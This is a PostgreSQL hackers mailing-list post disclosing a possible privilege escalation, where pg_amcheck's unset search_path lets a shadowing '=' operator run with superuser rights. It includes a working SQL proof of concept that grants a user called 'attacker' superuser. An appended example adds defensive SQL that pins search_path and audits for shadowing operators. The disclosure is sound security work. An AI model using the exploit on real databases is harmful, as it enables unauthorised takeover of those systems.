public inbox for pgsql-hackers@postgresql.org
From: Pavel Borisov <pashkin.elfe@gmail.com>
To: Postgres hackers <pgsql-hackers@lists.postgresql.org>
Subject: Permission elevation by pg_amcheck operator overloading via search_path possible?
Date: Fri, 22 May 2026 16:39:33 +0400
Message-ID: <CALT9ZEGFBCzNJbWAt_GNowUwmswXLShB2q6DjcS5pZ56qKMWaQ@mail.gmail.com>

Hi, hackers!

As I see, pg_amcheck doesn't set search_path.
It runs SQL queries like:

    SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN
    pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname =
    'amcheck'

Let's suppose search_path for the database is set:

    search_path = 'myschema, pg_catalog'

Then

    CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
    ALTER USER attacker WITH SUPERUSER;
    SELECT $1 OPERATOR(pg_catalog.=) $2;
    $$ LANGUAGE sql;
    CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
    PROCEDURE = myschema.evil);

Then run pg_amcheck as superuser.
So the user attacker can become SUPERUSER.

Is this scenario worth fixing?

Regards,
Pavel Borisov
Supabase
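
A defensive sketch of the issue raised above, as an added example that is not part of the original message and not taken from pg_amcheck's source: it pins search_path before any catalog query, restates the quoted query with schema-qualified operators, and audits for operators that duplicate pg_catalog ones. The audit query and its column aliases are illustrative assumptions.

```sql
-- 1. Pin name resolution before issuing any other statement. With an empty
--    search_path, pg_catalog is still searched implicitly and comes first.
SELECT pg_catalog.set_config('search_path', '', false);

-- 2. The catalog query from the message with every operator schema-qualified,
--    so it resolves to pg_catalog.= even if step 1 is skipped.
SELECT n.nspname, x.extversion
FROM pg_catalog.pg_extension x
JOIN pg_catalog.pg_namespace n
  ON x.extnamespace OPERATOR(pg_catalog.=) n.oid
WHERE x.extname OPERATOR(pg_catalog.=) 'amcheck';

-- 3. Audit: operators outside pg_catalog that duplicate the name and argument
--    types of a pg_catalog operator, i.e. candidates for shadowing whenever a
--    search_path lists their schema ahead of pg_catalog.
SELECT n.nspname                              AS shadow_schema,
       o.oprname                              AS operator_name,
       o.oprleft::pg_catalog.regtype          AS left_type,
       o.oprright::pg_catalog.regtype         AS right_type,
       o.oprcode                              AS implementing_function,
       pg_catalog.pg_get_userbyid(o.oprowner) AS owner
FROM pg_catalog.pg_operator o
JOIN pg_catalog.pg_namespace n
  ON n.oid OPERATOR(pg_catalog.=) o.oprnamespace
JOIN pg_catalog.pg_operator c
  ON c.oprname  OPERATOR(pg_catalog.=) o.oprname
 AND c.oprleft  OPERATOR(pg_catalog.=) o.oprleft
 AND c.oprright OPERATOR(pg_catalog.=) o.oprright
JOIN pg_catalog.pg_namespace cn
  ON cn.oid OPERATOR(pg_catalog.=) c.oprnamespace
WHERE cn.nspname OPERATOR(pg_catalog.=)  'pg_catalog'
  AND n.nspname  OPERATOR(pg_catalog.<>) 'pg_catalog'
ORDER BY 1, 2;
```

Any row returned by the audit deserves a look at who owns the operator and what its implementing function does before a privileged role connects to that database.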